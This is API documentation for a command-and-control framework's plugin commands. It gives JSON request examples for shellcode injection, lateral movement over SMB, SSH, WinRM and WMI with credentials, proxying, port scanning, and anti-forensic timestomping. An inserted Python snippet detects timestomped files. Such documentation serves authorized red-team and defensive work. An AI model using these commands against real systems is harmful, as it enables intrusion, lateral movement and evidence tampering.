Plugin Commands

This section lists plugin-based commands available via the REST API, their parameters, and usage examples.


connect-smb

Purpose: Connect to an SMB agent using a parent agent trigger.

Parameters:

  • host: IP address or domain of the SMB agent.
  • pipename: Name of the SMB pipe.

Example:

{
  "template": "connect-smb",
  "configuration": {
    "host": "smb.example.com",
    "pipename": "mypipe"
  }
}


connect-tcp

Purpose: Establish a connection for a TCP-BIND agent.

Parameters:

  • host: IP address or domain to connect to.
  • port: TCP port number.

Example:

{
  "template": "connect-tcp",
  "configuration": {
    "host": "192.168.1.10",
    "port": 8888
  }
}


cp

Purpose: Copy a file or directory on the target filesystem.

Parameters:

  • source: Source file/directory path.
  • destination: Destination file/directory path.

Example:

{
  "template": "cp",
  "configuration": {
    "source": "C:\\source.txt",
    "destination": "C:\\dest.txt"
  }
}


download

Purpose: Download a file from the agent’s filesystem.

Parameters:

  • filepath: File path to read (supports environment variables).

Example:

{
  "template": "download",
  "configuration": {
    "filepath": "C:\\path\\to\\file.txt"
  }
}


execute-assembly

Purpose: Execute a .NET assembly in memory.

Parameters:

  • @files.executable: .NET executable file content (base64 encoded if provided via API).
  • parameters: Command line arguments as an array of strings (e.g. ["--audit", "--verbose"]).

Note: Requires a multipart/form-data request if using @files.

Example:

--boundary
Content-Disposition: form-data; name="requestBody"
Content-Type: application/json; charset=UTF-8

{
  "template": "execute-assembly",
  "configuration": {
    "parameters": ["--audit"]
  }
}

--boundary
Content-Disposition: form-data; name="executable"; filename="dotnetprog.exe"

__DOTNET_FILE__


inject

Purpose: Inject and execute shellcode.

Parameters:

  • @files.shellcode: Shellcode content.

Example:

--boundary
{
  "template": "inject",
  "configuration": {}
}

--boundary
Content-Disposition: form-data; name="shellcode"; filename="shellcode.bin"

__SHELLCODE_FILE__


jump-service

Purpose: Copy a payload and create a Windows service for lateral movement.

Parameters:

  • target: Target machine IP/name (required).
  • payloadId: Service executable payload ID. Required when copyMethod is SMB.
  • copyMethod: Method for copying the payload (SMB, NONE). When omitted, defaults to SMB.
  • copyPath: Destination path for the copied file. Auto-generated if omitted.
  • servicePath: Path for the created service. Defaults to copyPath.
  • serviceName: Service name. Auto-generated if omitted.
  • serviceDisplayName: Display name for the service. Auto-generated if omitted.
  • cleanup: Delete the service after execution (default: true).
  • username: Username for remote authentication (if needed).
  • password: Password for remote authentication (if needed).

Example:

{
  "template": "jump-service",
  "configuration": {
    "payloadId": 1,
    "copyMethod": "SMB",
    "copyPath": "C:\\new_service.exe",
    "target": "target-machine",
    "servicePath": "C:\\new_service.exe",
    "serviceName": "new-service",
    "serviceDisplayName": "New Service"
  }
}


jump-ssh

Purpose: Execute commands or copy payloads via SSH for lateral movement.

Parameters:

  • payloadId: Executable payload ID. Required when copyMethod is SMB or SCP.
  • copyMethod: Copy method (SCP, SMB, NONE).
  • copyPath: Destination path on the target.
  • target: Target machine IP/name.
  • cmdline: Command line to execute on the target.
  • authMechanism: Authentication mechanism (CLASSIC, NTLM, KERBEROS). Default: CLASSIC. Note: NTLM/KERBEROS cannot be combined with key-based auth.
  • username: Username.
  • password: Password (required with CLASSIC if no privateKeyPEM).
  • @files.privateKeyPEM: Private key PEM file (required with CLASSIC if no password).
  • privateKeyPassword: Password for the private key file.

Example:

{
  "template": "jump-ssh",
  "configuration": {
    "payloadId": 1,
    "copyMethod": "SMB",
    "copyPath": "C:\\new_agent.exe",
    "target": "target-machine",
    "cmdline": "C:\\new_agent.exe",
    "username": "domain\\user",
    "password": "secret"
  }
}


jump-winrm

Purpose: Execute commands or run an executable via WinRM.

Parameters:

  • payloadId: Executable payload ID.
  • copyMethod: Copy method (SMB, NONE).
  • copyPath: Destination path.
  • target: Target machine IP/name.
  • executablePath: Path of the executable to run.
  • customPowershell: Custom PowerShell script.
  • username: Username (if needed).
  • password: Password (if needed).

Example:

{
  "template": "jump-winrm",
  "configuration": {
    "payloadId": 1,
    "copyMethod": "SMB",
    "copyPath": "C:\\new_agent.exe",
    "target": "target-machine",
    "executablePath": "C:\\new_agent.exe"
  }
}


jump-wmi

Purpose: Execute commands via WMI for lateral movement.

Parameters:

  • payloadId: Executable payload ID.
  • copyMethod: Copy method (SMB, NONE).
  • copyPath: Destination path.
  • target: Target machine IP/name.
  • cmdline: Command line to execute.
  • username: Username (if needed).
  • password: Password (if needed).

Example:

{
  "template": "jump-wmi",
  "configuration": {
    "payloadId": 1,
    "copyMethod": "SMB",
    "copyPath": "C:\\new_agent.exe",
    "target": "target-machine",
    "cmdline": "C:\\new_agent.exe"
  }
}


mkdir

Purpose: Create a new directory on the target system.

Parameters:

  • dirpath: Directory path to create (supports recursive creation).

Example:

{
  "template": "mkdir",
  "configuration": {
    "dirpath": "C:\\new\\directory"
  }
}


mv

Purpose: Move a file or directory on the target system.

Parameters:

  • source: Source file/directory path.
  • destination: Destination path.
  • overwrite: Allow overwriting the destination file (default: true).

Example:

{
  "template": "mv",
  "configuration": {
    "source": "C:\\old.txt",
    "destination": "C:\\new.txt"
  }
}


portscan

Purpose: Perform a TCP port scan and log discovered hosts and ports.

Parameters:

  • ips: IP addresses to scan (values or ranges, separated with commas).
  • ports: Ports to scan (values or ranges, separated with commas).
  • hostDiscovery: Method to use for host discovery: ICMP (default), ARP, or NONE (assumes host exists).
  • hostnameResolving: Method to resolve discovered hostnames: DNS, NETBIOS, ANY, or NONE.
  • timeout: Timeout in milliseconds.
  • threads: Number of concurrent threads for ARP requests.

Example:

{
  "template": "portscan",
  "configuration": {
    "ips": "192.168.1.0/24",
    "ports": "1-1024",
    "hostDiscovery": "ICMP",
    "timeout": 1000,
    "threads": 10
  }
}


procinfo

Purpose: Retrieve additional information about the agent’s process.

Parameters: None

Example:

{
  "template": "procinfo",
  "configuration": {}
}


rm

Purpose: Remove a file from the target filesystem.

Parameters:

  • filepath: File path to delete (supports environment variables).

Example:

{
  "template": "rm",
  "configuration": {
    "filepath": "C:\\path\\to\\file.txt"
  }
}


rmdir

Purpose: Remove a directory from the target filesystem.

Parameters:

  • dirpath: Directory path to delete (supports environment variables).

Example:

{
  "template": "rmdir",
  "configuration": {
    "dirpath": "C:\\path\\to\\delete"
  }
}


rportfwd

Purpose: Create a reverse port forward (traffic is forwarded through the C2).

Parameters:

  • bindIp: IP address/interface the agent listens on (all interfaces by default).
  • bindPort: Port the agent listens on.
  • forwardHost: Host to which traffic is redirected (data is sent from the Tuoni server).
  • forwardPort: Port to which traffic is redirected (data is sent from the Tuoni server).

Example:

{
  "template": "rportfwd",
  "configuration": {
    "bindPort": 1234,
    "forwardHost": "some.target.host",
    "forwardPort": 443
  }
}


screenshot

Purpose: Capture a screenshot of the target machine.

Parameters: None

Example:

{
  "template": "screenshot",
  "configuration": {}
}


socks5

Purpose: Create a SOCKS5 proxy on the agent’s network.

Parameters:

  • port: Port that C2 opens for the SOCKS5 proxy.

Example:

{
  "template": "socks5",
  "configuration": {
    "port": 8765
  }
}


spawn

Purpose: Spawn a new agent with provided configuration.

Parameters:

  • payloadId: Listener payload ID.
  • encryptedCommunication: Whether to encrypt communication.

Example:

{
  "template": "spawn",
  "configuration": {
    "payloadId": 1,
    "encryptedCommunication": true
  }
}


upload

Purpose: Upload a file to the target filesystem.

Parameters:

  • filepath: Destination file path (supports environment variables). Optional — when omitted, the uploaded filename is used.
  • @files.file: File content.

Example:

--boundary
{
  "template": "upload",
  "configuration": {
    "filepath": "C:\\path\\to\\dest.txt"
  }
}

--boundary
Content-Disposition: form-data; name="file"; filename="somefile.txt"

__UPLOAD_FILE__


upload-payload

Purpose: Write a generated payload to the target filesystem.

Parameters:

  • filepath: Destination file path (supports environment variables).
  • payloadId: ID of the payload to upload.

Example:

{
  "template": "upload-payload",
  "configuration": {
    "filepath": "C:\\path\\to\\agent.exe",
    "payloadId": 11
  }
}


powerpick

Purpose: Execute a PowerShell command or script without spawning powershell.exe. Uses an in-process unmanaged PowerShell runspace.

Parameters:

  • command: PowerShell command or script to execute. Optional — when omitted, an interactive session is opened.

Example:

{
  "template": "powerpick",
  "configuration": {
    "command": "Get-Process | Select-Object Name, Id"
  }
}


timestomp

Purpose: Modify file timestamps on the target system to aid anti-forensics.

Parameters:

  • target: Path of the file whose timestamps will be modified (required).
  • source: Path of a file to copy timestamps from. When provided, created, written, and accessed are ignored.
  • created: New creation timestamp (e.g. 2020-01-01T00:00:00). Optional.
  • written: New last-write timestamp. Optional.
  • accessed: New last-access timestamp. Optional.

Example:

{
  "template": "timestomp",
  "configuration": {
    "target": "C:\\path\\to\\file.exe",
    "source": "C:\\Windows\\System32\\notepad.exe"
  }
}
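
For analysts reviewing a host after an engagement, the two timestomp modes above (explicit values, or values copied from a source file) leave different traces when NTFS $STANDARD_INFORMATION and $FILE_NAME creation times are compared. The following is an added example, not part of the Tuoni documentation; the record field names and sample values are constructed, and it assumes the command changes only the $STANDARD_INFORMATION values.

```python
from datetime import datetime

# Constructed sample records (not from the page). Field names are hypothetical:
# si_created = $STANDARD_INFORMATION creation time, fn_created = $FILE_NAME creation time.
SAMPLE_RECORDS = [
    {"path": r"C:\Users\alice\report.docx",            # untouched file
     "si_created": "2024-03-02T10:15:42.4821937",
     "fn_created": "2024-03-02T10:15:42.4821937"},
    {"path": r"C:\path\to\file.exe",                   # explicit whole-second value set
     "si_created": "2020-01-01T00:00:00.0000000",
     "fn_created": "2024-05-11T08:31:07.1130542"},
    {"path": r"C:\path\to\other.exe",                  # times copied from an older file
     "si_created": "2019-12-07T09:08:45.2268311",
     "fn_created": "2024-05-11T08:40:12.9904410"},
]


def parse_ts(text):
    """Split an ISO timestamp into (datetime to the second, 100 ns ticks)."""
    base, _, frac = text.partition(".")
    ticks = int(frac.ljust(7, "0")[:7]) if frac else 0
    return datetime.strptime(base, "%Y-%m-%dT%H:%M:%S"), ticks


def analyze(record):
    """Return the list of timestomp indicators found in one record."""
    si, fn = parse_ts(record["si_created"]), parse_ts(record["fn_created"])
    findings = []
    # $FILE_NAME times are maintained by the file system rather than by
    # user-mode timestamp calls, so an earlier $STANDARD_INFORMATION time is suspect.
    if si < fn:
        findings.append("si_created_before_fn_created")
    # Second-precision input leaves the 100 ns fraction at exactly zero.
    if si[1] == 0 and fn[1] != 0:
        findings.append("si_zero_subsecond")
    return findings


def scan(records):
    """Map each flagged path to its indicators; clean files are omitted."""
    hits = {}
    for rec in records:
        findings = analyze(rec)
        if findings:
            hits[rec["path"]] = findings
    return hits


if __name__ == "__main__":
    for path, findings in scan(SAMPLE_RECORDS).items():
        print(path, findings)
```

Zero sub-second fractions also occur on files extracted from archives or copied from file systems with coarser timestamps, so treat that indicator as a lead and weigh it together with the $FILE_NAME comparison.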


remote-exec-ssh

Purpose: Execute a command on a remote host over SSH.

Parameters:

  • target: Target machine IP or hostname (required).
  • command: Command to execute on the remote host (required).
  • authMechanism: Authentication mechanism (CLASSIC, NTLM, KERBEROS). Default: CLASSIC. Note: NTLM/KERBEROS cannot be combined with key-based auth.
  • username: Username for authentication.
  • password: Password (required with CLASSIC if no privateKeyPEM).
  • @files.privateKeyPEM: Private key PEM file (required with CLASSIC if no password).
  • privateKeyPassword: Password for the private key file.

Example:

{
  "template": "remote-exec-ssh",
  "configuration": {
    "target": "target-machine",
    "command": "id",
    "username": "admin",
    "password": "secret"
  }
}


remote-exec-winrm

Purpose: Execute a PowerShell command on a remote host via WinRM.

Parameters:

  • target: Target machine IP or hostname (required).
  • command: PowerShell command to execute on the remote host (required).
  • username: Username for authentication (if needed).
  • password: Password for authentication (if needed).

Example:

{
  "template": "remote-exec-winrm",
  "configuration": {
    "target": "target-machine",
    "command": "whoami",
    "username": "domain\\user",
    "password": "secret"
  }
}


remote-exec-wmi

Purpose: Execute a command on a remote host via WMI.

Parameters:

  • target: Target machine IP or hostname (required).
  • command: Command to execute (required).
  • commandType: How the command is run: POWERSHELL, CMD, or CREATE_PROCESS. Default: POWERSHELL.
  • username: Username for authentication (if needed).
  • password: Password for authentication (if needed).
  • hideWindow: Hide the spawned process window (default: true).

Example:

{
  "template": "remote-exec-wmi",
  "configuration": {
    "target": "target-machine",
    "command": "whoami",
    "commandType": "CMD",
    "username": "domain\\user",
    "password": "secret"
  }
}


remote-exec-service

Purpose: Execute a command on a remote host by creating a temporary Windows service.

Parameters:

  • target: Target machine IP or hostname (required).
  • command: Command to execute (required).
  • commandType: How the command is run: POWERSHELL, CMD, or CREATE_PROCESS. Default: POWERSHELL.
  • username: Username for authentication (if needed).
  • password: Password for authentication (if needed).

Note: A randomly named Windows service is created, used to run the command, and then deleted automatically.

Example:

{
  "template": "remote-exec-service",
  "configuration": {
    "target": "target-machine",
    "command": "whoami > C:\\out.txt",
    "commandType": "CMD",
    "username": "domain\\user",
    "password": "secret"
  }
}


remote-upload-scp

Purpose: Upload a payload or a custom file to a remote host via SCP.

Parameters:

  • target: Target machine IP or hostname (required).
  • path: Destination path on the remote host.
  • payloadId: ID of a generated payload to upload. Mutually exclusive with @files.uploadFile.
  • @files.uploadFile: File to upload. Mutually exclusive with payloadId.
  • authMechanism: Authentication mechanism (CLASSIC, NTLM, KERBEROS). Default: CLASSIC. Note: NTLM/KERBEROS cannot be combined with key-based auth.
  • username: Username for authentication.
  • password: Password (required with CLASSIC if no privateKeyPEM).
  • @files.privateKeyPEM: Private key PEM file (required with CLASSIC if no password).
  • privateKeyPassword: Password for the private key file.

Note: Exactly one of payloadId or @files.uploadFile must be set, not both.

Note (payload upload): Requires only a JSON body.

Example:

{
  "template": "remote-upload-scp",
  "configuration": {
    "payloadId": 5,
    "path": "/tmp/agent",
    "target": "target-machine",
    "username": "admin",
    "password": "secret"
  }
}

Note (file upload): Requires a multipart/form-data request.

--boundary
Content-Disposition: form-data; name="requestBody"
Content-Type: application/json; charset=UTF-8

{
  "template": "remote-upload-scp",
  "configuration": {
    "path": "/tmp/myfile",
    "target": "target-machine",
    "username": "admin",
    "password": "secret"
  }
}

--boundary
Content-Disposition: form-data; name="uploadFile"; filename="myfile.bin"

__UPLOAD_FILE__